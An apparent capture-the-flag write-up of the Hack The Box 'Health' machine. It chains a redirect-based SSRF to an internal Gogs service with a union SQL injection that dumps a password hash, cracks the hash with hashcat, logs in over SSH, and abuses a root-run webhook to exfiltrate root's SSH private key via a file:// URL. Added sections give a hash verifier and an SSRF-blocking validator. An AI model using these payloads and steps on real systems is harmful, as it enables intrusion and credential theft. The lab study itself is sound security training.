## Nmap

```text
┌──(kali㉿DESKTOP-FQ305P5)-[~/Documents/HackTheBox/Health]
└─$ nmap -sC -sV -T4 -vv -oN nmapresults.txt 10.10.11.176 -Pn
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-25 13:20 CEST
NSE: Loaded 155 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 13:20
Completed NSE at 13:20, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 13:20
Completed NSE at 13:20, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 13:20
Completed NSE at 13:20, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 13:20
Completed Parallel DNS resolution of 1 host. at 13:20, 1.05s elapsed
Initiating Connect Scan at 13:20
Scanning 10.10.11.176 [1000 ports]
Discovered open port 22/tcp on 10.10.11.176
Discovered open port 80/tcp on 10.10.11.176
Completed Connect Scan at 13:20, 2.50s elapsed (1000 total ports)
Initiating Service scan at 13:20
Scanning 2 services on 10.10.11.176
Completed Service scan at 13:20, 6.09s elapsed (2 services on 1 host)
NSE: Script scanning 10.10.11.176.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 13:20
Completed NSE at 13:20, 1.60s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 13:20
Completed NSE at 13:20, 0.11s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 13:20
Completed NSE at 13:20, 0.00s elapsed
Nmap scan report for 10.10.11.176
Host is up, received user-set (0.022s latency).
Scanned at 2022-09-25 13:20:46 CEST for 11s
Not shown: 997 closed tcp ports (conn-refused)
PORT     STATE    SERVICE REASON      VERSION
22/tcp   open     ssh     syn-ack     OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 32:b7:f4:d4:2f:45:d3:30:ee:12:3b:03:67:bb:e6:31 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQChNRnKkpENG89qQHjD+2Kt9H7EDTMkQpzin70Rok0geRogbYVckxywChDv3yYhaDWQ9RrsOcWLs3uGzZR9nCfXOE3uTENbSWV5GdCd3wQNmWcSlkTD4dRcZshaAoMjs1bwzhK+cOy3ZU/ywbIXdHvAz3+Xvyz5yoEnboWYdWtBNFniZ7y/mZtA/XN19sCt5PcmeY40YFSuaVy/PUQnozplBVBIN6W5gnSE0Y+3J1MLBUkvf4+5zKvC+WLqA394Y1M+/UcVcPAjo6maik1JZNAmquWWo+y+28PdXSm9F2p2HAvwJjXc96f+Fl80+P4j1yxrhWC5AZM8fNCX8FjD7Jl7
|   256 86:e1:5d:8c:29:39:ac:d7:e8:15:e6:49:e2:35:ed:0c (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBOR0vwVJwhe/5A7dkomT/li2XC2nvv6/4J6Oe8Xeyi/YQspx3RQGz3aG1sWTPstLu7yno0Z+Lk/GotRdyivSdLA=
|   256 ef:6b:ad:64:d5:e4:5b:3e:66:79:49:f4:ec:4c:23:9f (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAINgiR3y8U+HenhKVoN1EFipbmC6EjO3fWwWPUqa8EeJh
80/tcp   open     http    syn-ack     Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: HTTP Monitoring Tool
|_http-favicon: Unknown favicon MD5: D41D8CD98F00B204E9800998ECF8427E
| http-methods:
|_  Supported Methods: GET HEAD OPTIONS
3000/tcp filtered ppp     no-response
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 13:20
Completed NSE at 13:20, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 13:20
Completed NSE at 13:20, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 13:20
Completed NSE at 13:20, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.69 seconds
Segmentation fault
```
## Webserver port 80

When accessing the webserver through a browser we see:

This is a free utility that allows you to remotely check whether an HTTP service is available, through a webhook. What is a webhook? A webhook can be thought of as a type of API that is driven by events rather than requests.

Because we can specify both a Payload URL and a Monitored URL, we can start our own webserver as the Monitored URL and have it redirect the incoming request to the target's own localhost on port 3000. We then set up a listener as the Payload URL to see what the returned request contains, and hopefully learn what is behind port 3000 on our target.
Python webserver script for redirecting incoming traffic:

```python
import sys
from http.server import HTTPServer, BaseHTTPRequestHandler


class Redirect(BaseHTTPRequestHandler):
    """Answer every GET with a 302 to the URL given on the command line."""

    def do_GET(self):
        self.send_response(302)
        self.send_header('Location', sys.argv[1])
        self.end_headers()


if len(sys.argv) != 2:
    sys.exit(f"usage: {sys.argv[0]} <redirect-target-url>")

# Binding port 80 needs root, hence the sudo in the command below.
HTTPServer(("0.0.0.0", 80), Redirect).serve_forever()
```
Netcat listener:
Running the redirect script with the remote target:
```shell
┌──(kali㉿DESKTOP-FQ305P5)-[~/Documents/HackTheBox/Health]
└─$ sudo python3 redirect.py http://127.0.0.1:3000/
```
Testing the webhook:
Netcat got the following answer from the service running on port 3000:
```json
{"webhookUrl":"http:\/\/10.10.14.159:4444\/","monitoredUrl":"http:\/\/10.10.14.159\/","health":"up","body":"<!DOCTYPE html>\n<html>\n\t<head data-suburl=\"\">\n\t\t<meta http-equiv=\"Content-Type\" content=\"text\/html; charset=UTF-8\" \/>\n <meta http-equiv=\"X-UA-Compatible\" content=\"IE=edge\"\/>\n <meta name=\"author\" content=\"Gogs - Go Git Service\" \/>\n\t\t<meta name=\"description\" content=\"Gogs(Go Git Service) a painless self-hosted Git Service written in Go\" \/>\n\t\t<meta name=\"keywords\" content=\"go, git, self-hosted, gogs\">\n\t\t<meta name=\"_csrf\" content=\"HTmxOebCrhkrwLxEz9EAucukVe86MTY2NDMwMDEyNzc3MzUyNTQwNA==\" \/>\n\t\t\n\n\t\t<link rel=\"shortcut icon\" href=\"\/img\/favicon.png\" \/>\n\n\t\t\n\t\t<link rel=\"stylesheet\" href=\"\/\/maxcdn.bootstrapcdn.com\/font-awesome\/4.2.0\/css\/font-awesome.min.css\">\n\n\t\t<script src=\"\/\/code.jquery.com\/jquery-1.11.1.min.js\"><\/script>\n\t\t\n\t\t\n\t\t<link rel=\"stylesheet\" href=\"\/ng\/css\/ui.css\">\n\t\t<link rel=\"stylesheet\" href=\"\/ng\/css\/gogs.css\">\n\t\t<link rel=\"stylesheet\" href=\"\/ng\/css\/tipsy.css\">\n\t\t<link rel=\"stylesheet\" href=\"\/ng\/css\/magnific-popup.css\">\n\t\t<link rel=\"stylesheet\" href=\"\/ng\/fonts\/octicons.css\">\n\t\t<link rel=\"stylesheet\" href=\"\/css\/github.min.css\">\n\n\t\t\n \t<script src=\"\/ng\/js\/lib\/lib.js\"><\/script>\n \t<script src=\"\/ng\/js\/lib\/jquery.tipsy.js\"><\/script>\n \t<script src=\"\/ng\/js\/lib\/jquery.magnific-popup.min.js\"><\/script>\n <script src=\"\/ng\/js\/utils\/tabs.js\"><\/script>\n <script src=\"\/ng\/js\/utils\/preview.js\"><\/script>\n\t\t<script src=\"\/ng\/js\/gogs.js\"><\/script>\n\n\t\t<title>Gogs: Go Git Service<\/title>\n\t<\/head>\n\t<body>\n\t\t<div id=\"wrapper\">\n\t\t<noscript>Please enable JavaScript in your browser!<\/noscript>\n\n<header id=\"header\">\n <ul class=\"menu menu-line container\" id=\"header-nav\">\n \n\n \n \n <li class=\"right\" id=\"header-nav-help\">\n <a
target=\"_blank\" href=\"http:\/\/gogs.io\/docs\"><i class=\"octicon octicon-info\"><\/i> Help<\/a>\n <\/li>\n <li class=\"right\" id=\"header-nav-explore\">\n <a href=\"\/explore\"><i class=\"octicon octicon-globe\"><\/i> Explore<\/a>\n <\/li>\n \n \n <\/ul>\n<\/header>\n<div id=\"promo-wrapper\">\n <div class=\"container clear\">\n <div id=\"promo-logo\" class=\"left\">\n <img src=\"\/img\/gogs-lg.png\" alt=\"logo\" \/>\n <\/div>\n <div id=\"promo-content\">\n <h1>Gogs<\/h1>\n <h2>A painless self-hosted Git service written in Go<\/h2>\n <form id=\"promo-form\" action=\"\/user\/login\" method=\"post\">\n <input type=\"hidden\" name=\"_csrf\" value=\"HTmxOebCrhkrwLxEz9EAucukVe86MTY2NDMwMDEyNzc3MzUyNTQwNA==\">\n <input class=\"ipt ipt-large\" id=\"username\" name=\"uname\" type=\"text\" placeholder=\"Username or E-mail\"\/>\n <input class=\"ipt ipt-large\" name=\"password\" type=\"password\" placeholder=\"Password\"\/>\n <input name=\"from\" type=\"hidden\" value=\"home\">\n <button class=\"btn btn-black btn-large\">Sign In<\/button>\n <button class=\"btn btn-green btn-large\" id=\"register-button\">Register<\/button>\n <\/form>\n <div id=\"promo-social\" class=\"social-buttons\">\n \n\n\n\n <\/div>\n <\/div> \n <\/div>\n<\/div>\n<div id=\"feature-wrapper\">\n <div class=\"container clear\">\n \n <div class=\"grid-1-2 left\">\n <i class=\"octicon octicon-flame\"><\/i>\n <b>Easy to install<\/b>\n <p>Simply <a target=\"_blank\" href=\"http:\/\/gogs.io\/docs\/installation\/install_from_binary.html\">run the binary<\/a> for your platform.
Or ship Gogs with <a target=\"_blank\" href=\"https:\/\/github.com\/gogits\/gogs\/tree\/master\/dockerfiles\">Docker<\/a> or <a target=\"_blank\" href=\"https:\/\/github.com\/geerlingguy\/ansible-vagrant-examples\/tree\/master\/gogs\">Vagrant<\/a>, or get it <a target=\"_blank\" href=\"http:\/\/gogs.io\/docs\/installation\/install_from_packages.html\">packaged<\/a>.<\/p>\n <\/div>\n <div class=\"grid-1-2 left\">\n <i class=\"octicon octicon-device-desktop\"><\/i>\n <b>Cross-platform<\/b>\n <p>Gogs runs anywhere <a target=\"_blank\" href=\"http:\/\/golang.org\/\">Go<\/a> can compile for: Windows, Mac OS X, Linux, ARM, etc. Choose the one you love!<\/p>\n <\/div>\n <div class=\"grid-1-2 left\">\n <i class=\"octicon octicon-rocket\"><\/i>\n <b>Lightweight<\/b>\n <p>Gogs has low minimal requirements and can run on an inexpensive Raspberry Pi. Save your machine energy!<\/p>\n <\/div>\n <div class=\"grid-1-2 left\">\n <i class=\"octicon octicon-code\"><\/i>\n <b>Open Source<\/b>\n <p>It's all on <a target=\"_blank\" href=\"https:\/\/github.com\/gogits\/gogs\/\">GitHub<\/a>! Join us by contributing to make this project even better.
Don't be shy to be a contributor!<\/p>\n <\/div>\n \n <\/div>\n<\/div>\n\t\t<\/div>\n\t\t<footer id=\"footer\">\n\t\t <div class=\"container clear\">\n\t\t <p class=\"left\" id=\"footer-rights\">\u00a9 2014 GoGits \u00b7 Version: 0.5.5.1010 Beta \u00b7 Page: <strong>1ms<\/strong> \u00b7\n\t\t Template: <strong>1ms<\/strong><\/p>\n\n\t\t <div class=\"right\" id=\"footer-links\">\n\t\t <a target=\"_blank\" href=\"https:\/\/github.com\/gogits\/gogs\"><i class=\"fa fa-github-square\"><\/i><\/a>\n\t\t <a target=\"_blank\" href=\"https:\/\/twitter.com\/gogitservice\"><i class=\"fa fa-twitter\"><\/i><\/a>\n\t\t <a target=\"_blank\" href=\"https:\/\/plus.google.com\/communities\/115599856376145964459\"><i class=\"fa fa-google-plus\"><\/i><\/a>\n\t\t <a target=\"_blank\" href=\"http:\/\/weibo.com\/gogschina\"><i class=\"fa fa-weibo\"><\/i><\/a>\n\t\t <div id=\"footer-lang\" class=\"inline drop drop-top\">Language\n\t\t <div class=\"drop-down\">\n\t\t <ul class=\"menu menu-vertical switching-list\">\n\t\t \t\n\t\t <li><a href=\"#\">English<\/a><\/li>\n\t\t \n\t\t <li><a href=\"\/?lang=zh-CN\">\u7b80\u4f53\u4e2d\u6587<\/a><\/li>\n\t\t \n\t\t <li><a href=\"\/?lang=zh-HK\">\u7e41\u9ad4\u4e2d\u6587<\/a><\/li>\n\t\t \n\t\t <li><a href=\"\/?lang=de-DE\">Deutsch<\/a><\/li>\n\t\t \n\t\t <li><a href=\"\/?lang=fr-CA\">Fran\u00e7ais<\/a><\/li>\n\t\t \n\t\t <li><a href=\"\/?lang=nl-NL\">Nederlands<\/a><\/li>\n\t\t \n\t\t <\/ul>\n\t\t <\/div>\n\t\t <\/div>\n\t\t <a target=\"_blank\" href=\"http:\/\/gogs.io\">Website<\/a>\n\t\t <span class=\"version\">Go1.3.2<\/span>\n\t\t <\/div>\n\t\t <\/div>\n\t\t<\/footer>\n\t<\/body>\n<\/html>","message":"HTTP\/1.0 302 Found","headers":{"Server":"BaseHTTP\/0.6 Python\/3.10.7","Date":"Tue, 27 Sep 2022 17:35:27 GMT","Location":"http:\/\/127.0.0.1:3000\/","Content-Type":"text\/html; charset=UTF-8","Set-Cookie":"_csrf=; Path=\/; Max-Age=0"}}
```
Well, look at that. It looks like Gogs is installed on port 3000 (the footer of the returned page even gives the version, 0.5.5.1010 Beta). I searched online and with searchsploit for exploits against Gogs:

```text
┌──(kali㉿DESKTOP-FQ305P5)-[~]
└─$ searchsploit Gogs
------------------------------------------------- ---------------------------------
 Exploit Title                                   |  Path
------------------------------------------------- ---------------------------------
Gogs - 'label' SQL Injection                     | multiple/webapps/35237.txt
Gogs - 'users' /'repos' '?q' SQL Injection       | multiple/webapps/35238.txt
------------------------------------------------- ---------------------------------
```

It looks like it is vulnerable to SQL injection: https://www.exploit-db.com/exploits/35238
## Finding credentials with SQL Injection

Time to exploit this vulnerability using the same method as before, but with the SQL injection inside the redirect target:

```shell
sudo python3 redirect.py "http://127.0.0.1:3000/api/v1/users/search?q=')/**/union/**/all/**/select/**/1,1,(select/**/passwd/**/from/**/user),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1--"
```
Data:
```json
"{\"data\":[{\"username\":\"susanne\",\"avatar\":\"\/\/1.gravatar.com\/avatar\/c11d48f16f254e918744183ef7b89fce\"},{\"username\":\"66c074645545781f1064fb7fd1177453db8f0ca2ce58a9d81c04be2e6d3ba2a0d6c032f0fd4ef83f48d74349ec196f4efe37\",\"avatar\":\"\/\/1.gravatar.com\/avatar\/1\"}
```

It looks like some kind of hash; let's also get the salt that goes with it:

```shell
sudo python3 redirect.py "http://127.0.0.1:3000/api/v1/users/search?q=')/**/union/**/all/**/select/**/1,1,(select/**/salt/**/from/**/user),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1--"
```

```json
{
  "webhookUrl": "http:\/\/10.10.14.159:4444\/",
  "monitoredUrl": "http:\/\/10.10.14.159\/",
  "health": "up",
  "body": "{\"data\":[{\"username\":\"susanne\",\"avatar\":\"\/\/1.gravatar.com\/avatar\/c11d48f16f254e918744183ef7b89fce\"},{\"username\":\"sO3XIbeW14\",\"avatar\":\"\/\/1.gravatar.com\/avatar\/1\"}],\"ok\":true}",
  "message": "HTTP\/1.0 302 Found",
  "headers": {
    "Server": "BaseHTTP\/0.6 Python\/3.10.7",
    "Date": "Tue, 27 Sep 2022 17:46:18 GMT",
    "Location": "http:\/\/127.0.0.1:3000\/api\/v1\/users\/search?q=')\/**\/union\/**\/all\/**\/select\/**\/1,1,(select\/**\/salt\/**\/from\/**\/user),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1--",
    "Content-Type": "application\/json; charset=UTF-8",
    "Set-Cookie": "_csrf=; Path=\/; Max-Age=0",
    "Content-Length": "174"
  }
}
```
Salt: sO3XIbeW14
Hash: sO3XIbeW14:66c074645545781f1064fb7fd1177453db8f0ca2ce58a9d81c04be2e6d3ba2a0d6c032f0fd4ef83f48d74349ec196f4efe37
## Finding the hash algorithm that gogs.io uses and cracking it

I had no idea what type of hash I was looking at, so I googled terms like “gogs.io hashing” and “gogs.io SHA” and found some articles talking about SHA256: https://github.com/gogs/gogs/issues/4269. So let's try to format our hash as SHA256 and crack it. I also found this repo: https://github.com/kxcode/KrackerGo, which states that Gogs uses PBKDF2 SHA256. So let's try that first.

The hashcat format for mode 10900:

```text
10900 | PBKDF2-HMAC-SHA256 | sha256:1000:MTc3MTA0MTQwMjQxNzY=:PYjCU215Mi57AYPKva9j7mvF4Rc5bCnt
```

First we have to convert the hash into the hashcat format before we can crack it (the salt is base64-encoded as-is, the hex hash is converted to raw bytes and then base64-encoded):

```shell
┌──(kali㉿DESKTOP-FQ305P5)-[~/Documents/HackTheBox/Health]
└─$ echo 'sha256:10000:'$(echo 'sO3XIbeW14' | base64 | cut -c1-14)':'$(echo '66c074645545781f1064fb7fd1177453db8f0ca2ce58a9d81c04be2e6d3ba2a0d6c032f0fd4ef83f48d74349ec196f4efe37' | xxd -r -p | base64)
sha256:10000:c08zWEliZVcxNA:ZsB0ZFVFeB8QZPt/0Rd0U9uPDKLOWKnYHAS+Lm07oqDWwDLw/U74P0jXQ0nsGW9O/jc=
```
Time to crack the hash with hashcat mode 10900:

```shell
┌──(kali㉿DESKTOP-FQ305P5)-[~/Documents/HackTheBox/Health]
└─$ hashcat -m 10900 -a 0 sha256:10000:c08zWEliZVcxNA:ZsB0ZFVFeB8QZPt/0Rd0U9uPDKLOWKnYHAS+Lm07oqDWwDLw/U74P0jXQ0nsGW9O/jc= ../rockyou.txt
```
Cracked!
```text
sha256:10000:c08zWEliZVcxNA:ZsB0ZFVFeB8QZPt/0Rd0U9uPDKLOWKnYHAS+Lm07oqDWwDLw/U74P0jXQ0nsGW9O/jc=:february15

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 10900 (PBKDF2-HMAC-SHA256)
Hash.Target......: sha256:10000:c08zWEliZVcxNA:ZsB0ZFVFeB8QZPt/0Rd0U9u...9O/jc=
Time.Started.....: Tue Sep 27 20:11:32 2022 (12 secs)
Time.Estimated...: Tue Sep 27 20:11:44 2022 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (../rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.
Recovered........: 1/1 (100.00%) Digests
Progress.........: 73728/14344384 (0.51%)
Rejected.........: 0/73728 (0.00%)
Restore.Point....: 70656/14344384 (0.49%)
Restore.Sub.
Candidate.Engine.: Device Generator
Candidates.

Started: Tue Sep 27 20:10:54 2022
Stopped: Tue Sep 27 20:11:45 2022
```
Password : february15
Username: susanne
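Added example, not part of the write-up: the same hashcat conversion done in Python, plus a check that recomputes the Gogs hash for a candidate password, so the algorithm identification can be confirmed independently of hashcat. It assumes the scheme Gogs uses for its `passwd` column, PBKDF2-HMAC-SHA256 with 10000 rounds and a 50-byte output, which is what the 100-hex-character hash and the mode 10900 line above imply.

```python
import base64
import hashlib
import hmac

# Assumed Gogs scheme: passwd = hex(PBKDF2-HMAC-SHA256(password, salt, 10000, 50 bytes)),
# with the 10-character salt stored in a separate column. 50 bytes -> 100 hex chars,
# which matches the length of the leaked value.
GOGS_ITERATIONS = 10000
GOGS_KEY_LEN = 50

# Values recovered in the write-up above.
SALT = "sO3XIbeW14"
PASSWD_HEX = ("66c074645545781f1064fb7fd1177453db8f0ca2ce58a9d81c04be2e6d3ba2a0"
              "d6c032f0fd4ef83f48d74349ec196f4efe37")


def gogs_passwd(password: str, salt: str) -> str:
    """Recompute the Gogs passwd column for a candidate password."""
    derived = hashlib.pbkdf2_hmac("sha256", password.encode(), salt.encode(),
                                  GOGS_ITERATIONS, GOGS_KEY_LEN)
    return derived.hex()


def verify_gogs_password(password: str, salt: str, passwd_hex: str) -> bool:
    """Constant-time comparison of a candidate against the stored hash,
    the same check a login handler should perform."""
    return hmac.compare_digest(gogs_passwd(password, salt), passwd_hex)


def to_hashcat_10900(salt: str, passwd_hex: str, iterations: int = GOGS_ITERATIONS) -> str:
    """Build sha256:<iterations>:<b64 salt>:<b64 hash>, the mode 10900 input.
    The salt padding is stripped to match the string hashcat accepted above;
    doing the conversion here also avoids the newline `echo | base64` adds."""
    salt_b64 = base64.b64encode(salt.encode()).decode().rstrip("=")
    hash_b64 = base64.b64encode(bytes.fromhex(passwd_hex)).decode()
    return f"sha256:{iterations}:{salt_b64}:{hash_b64}"


if __name__ == "__main__":
    print(to_hashcat_10900(SALT, PASSWD_HEX))
    print("february15 matches:", verify_gogs_password("february15", SALT, PASSWD_HEX))
```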
## SSH user susanne

The credentials we found through the SQL injection work for SSH.

```text
┌──(kali㉿DESKTOP-FQ305P5)-[~/Documents/HackTheBox/Health]
└─$ ssh susanne@10.10.11.176
The authenticity of host '10.10.11.176 (10.10.11.176)' can't be established.
ED25519 key fingerprint is SHA256:K0WrmjTWDZhl/D/mYbJSv/cBLF1Jnx0T2auXQQDc7/Q.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.176' (ED25519) to the list of known hosts.
susanne@10.10.11.176's password:
Welcome to Ubuntu 18.04.6 LTS (GNU/Linux 4.15.0-191-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Tue Sep 27 18:12:56 UTC 2022

  System load:  0.0               Processes:           177
  Usage of /:   68.1% of 3.84GB   Users logged in:     0
  Memory usage: 16%               IP address for eth0: 10.10.11.176
  Swap usage:   0%

0 updates can be applied immediately.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Tue Sep 27 16:14:38 2022 from 10.10.14.142
susanne@health:~$
```
## PE to Root

With linpeas.sh we find some Laravel database credentials:

```ini
DB_CONNECTION=mysql
DB_HOST=127.0.0.1
DB_PORT=3306
DB_DATABASE=laravel
DB_USERNAME=laravel
DB_PASSWORD=MYsql_strongestpass@2014+
```
Connecting to that database:
```text
susanne@health:/tmp$ mysql
ERROR 1045 (28000): Access denied for user 'susanne'@'localhost' (using password: NO)
susanne@health:/tmp$ mysql -h localhost -u laravel -p laravel
Enter password:
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 42
Server version: 5.7.39-0ubuntu0.18.04.2 (Ubuntu)

Copyright (c) 2000, 2022, Oracle and/or its affiliates.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> SHOW DATABASES;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| laravel            |
+--------------------+
2 rows in set (0.00 sec)

mysql> select * from laravel
    -> ;
ERROR 1146 (42S02): Table 'laravel.laravel' doesn't exist
mysql> show TABLES;
+------------------------+
| Tables_in_laravel      |
+------------------------+
| failed_jobs            |
| migrations             |
| password_resets        |
| personal_access_tokens |
| tasks                  |
| users                  |
+------------------------+
6 rows in set (0.00 sec)

mysql> select * from users;
Empty set (0.00 sec)

mysql> select * from laravel.users;
Empty set (0.00 sec)

mysql> select * from laravels.users;
ERROR 1142 (42000): SELECT command denied to user 'laravel'@'localhost' for table 'users'
mysql> select * from susers;
ERROR 1146 (42S02): Table 'laravel.susers' doesn't exist
mysql> select * from users;
Empty set (0.00 sec)

mysql> select * from tasks;
Empty set (0.00 sec)

mysql> select * from personal_access_tokens;
Empty set (0.00 sec)

mysql> select * from password_resets;
Empty set (0.00 sec)

mysql> select * from failed_jobs;
Empty set (0.00 sec)

mysql> select * from migrations;
+----+-------------------------------------------------------+-------+
| id | migration                                             | batch |
+----+-------------------------------------------------------+-------+
|  1 | 2014_10_12_000000_create_users_table                  |     1 |
|  2 | 2014_10_12_100000_create_password_resets_table        |     1 |
|  3 | 2019_08_19_000000_create_failed_jobs_table            |     1 |
|  4 | 2019_12_14_000001_create_personal_access_tokens_table |     1 |
|  5 | 2022_05_17_093614_create_tasks_table                  |     1 |
+----+-------------------------------------------------------+-------+
5 rows in set (0.00 sec)

mysql> \! sh
$ id
uid=1000(susanne) gid=1000(susanne) groups=1000(susanne)
$
```
Nothing interesting here, so let's continue with pspy:

```text
UID=0    PID=2829   | /bin/bash -c cd /var/www/html && php artisan schedule:run >> /dev/null 2>&1
UID=0    PID=2850   | mysql laravel --execute TRUNCATE tasks
```

I found these two processes running very often. Again we see something that has to do with the Laravel database, but this time it is executed as root (UID=0), so we have a foothold here. That something has to do with the webhooks of the web application on port 80.
I found this HealthChecker.php file, which included the following code:
```shell
susanne@health:/var/www/html/app/Http/Controllers$ cat HealthChecker.php
```

```php
// Excerpt from HealthChecker.php as printed above; the method starts before
// this brace and continues after the last line shown.
{
    $json = [];
    $json['webhookUrl'] = $webhookUrl;
    $json['monitoredUrl'] = $monitoredUrl;
    // Whatever is stored in monitoredUrl is fetched as-is: no scheme or host
    // check, so file:// and localhost URLs are accepted.
    $res = @file_get_contents($monitoredUrl, false);
    if ($res) {
        if ($onlyError) {
            return $json;
        }
        $json['health'] = "up";
        $json['body'] = $res;
        if (isset($http_response_header)) {
            $headers = [];
            $json['message'] = $http_response_header[0];
            for ($i = 0; $i <= count($http_response_header) - 1; $i++) {
                $split = explode(':', $http_response_header[$i], 2);
                if (count($split) == 2) {
                    $headers[trim($split[0])] = trim($split[1]);
                } else {
                    error_log("invalid header pair: $http_response_header[$i]\n");
                }
            }
```

So, once a webhook task exists in the database table `tasks`, we can change its `monitoredUrl` directly in the database; the scheduled check, which runs as root, then fetches whatever we point it at and posts the result to our webhook, which will make us root on the server.
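The root cause above is twofold: `file_get_contents` accepts any scheme, and the URL is trusted at fetch time even though it came from a database row anyone with the Laravel credentials can edit. As an added example (not the project's code, written in Python rather than PHP), here is the validation such a checker should apply on every fetch, including every hop of a redirect chain, which is what defeats the 302-to-localhost trick used earlier. The hostname `monitor.example`, its address and the `send` callback are constructed stand-ins so the demo runs offline.

```python
import ipaddress
import socket
from urllib.parse import urljoin, urlsplit

# A health monitor only needs http(s). file://, ftp://, php:// and the other
# PHP stream wrappers are what turned monitoredUrl into a file read as root.
ALLOWED_SCHEMES = {"http", "https"}
MAX_REDIRECTS = 3


def default_resolver(host):
    """Every address the hostname currently resolves to (A and AAAA)."""
    return [info[4][0] for info in socket.getaddrinfo(host, None)]


def is_safe_monitor_url(url, resolver=default_resolver):
    """True only for an http(s) URL whose host resolves solely to public unicast
    addresses. Every record is checked, so a name with one public and one
    loopback record cannot smuggle a request to 127.0.0.1."""
    try:
        parts = urlsplit(url)
    except ValueError:
        return False
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False                    # file:///root/.ssh/id_rsa stops here
    host = parts.hostname
    if not host or parts.username or parts.password:
        return False                    # no empty host, no user:pass@host games
    try:
        addrs = [ipaddress.ip_address(host)]          # literal IP: no DNS needed
    except ValueError:
        try:
            addrs = [ipaddress.ip_address(a) for a in resolver(host)]
        except (socket.gaierror, ValueError):
            return False
    # is_global is False for loopback, RFC 1918, link-local (cloud metadata),
    # shared address space and the documentation ranges.
    return bool(addrs) and all(a.is_global and not a.is_multicast for a in addrs)


def fetch_monitored(url, send, resolver=default_resolver):
    """Fetch like the health checker, but validate every hop of a redirect
    chain. `send(url)` performs ONE request without following redirects and
    returns (status, headers, body); it is injected so this runs offline."""
    for _ in range(MAX_REDIRECTS + 1):
        if not is_safe_monitor_url(url, resolver):
            raise ValueError(f"refusing to fetch {url}")
        status, headers, body = send(url)
        if status not in (301, 302, 303, 307, 308):
            return url, body
        location = headers.get("Location")
        if not location:
            raise ValueError("redirect without Location header")
        url = urljoin(url, location)    # resolve relative Location values
    raise ValueError("too many redirects")


# Constructed stand-in for the attacker's redirect.py: the first hop answers
# 302 -> the target's own Gogs on port 3000, as in the write-up.
FAKE_DNS = {"monitor.example": ["93.184.216.34"]}   # constructed public record


def fake_resolver(host):
    return FAKE_DNS.get(host, [])


def fake_send(url):
    if url == "http://monitor.example/":
        return 302, {"Location": "http://127.0.0.1:3000/"}, ""
    return 200, {}, "ok"


def demo():
    """Run the checks against the URLs that appear in this write-up."""
    results = {
        "file_scheme": is_safe_monitor_url("file:///root/.ssh/id_rsa"),
        "loopback": is_safe_monitor_url("http://127.0.0.1:3000/api/v1/users/search"),
        "attacker_lan": is_safe_monitor_url("http://10.10.14.159:4444/"),
        "public_host": is_safe_monitor_url("http://monitor.example/", fake_resolver),
    }
    try:
        fetch_monitored("http://monitor.example/", fake_send, fake_resolver)
        results["redirect_blocked"] = False
    except ValueError:
        results["redirect_blocked"] = True
    return results


if __name__ == "__main__":
    print(demo())
```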
First we create a webhook:
Then we set the `monitoredUrl` to a file (root's private key):

```text
mysql> update tasks set monitoredUrl='file:///root/.ssh/id_rsa';
Query OK, 0 rows affected (0.00 sec)
Rows matched: 0  Changed: 0  Warnings: 0
```
Now we should see the key appear in our netcat listener:

```json
{
  "webhookUrl": "http:\/\/10.10.14.159\/",
  "monitoredUrl": "file:\/\/\/root\/.ssh\/id_rsa",
  "health": "up",
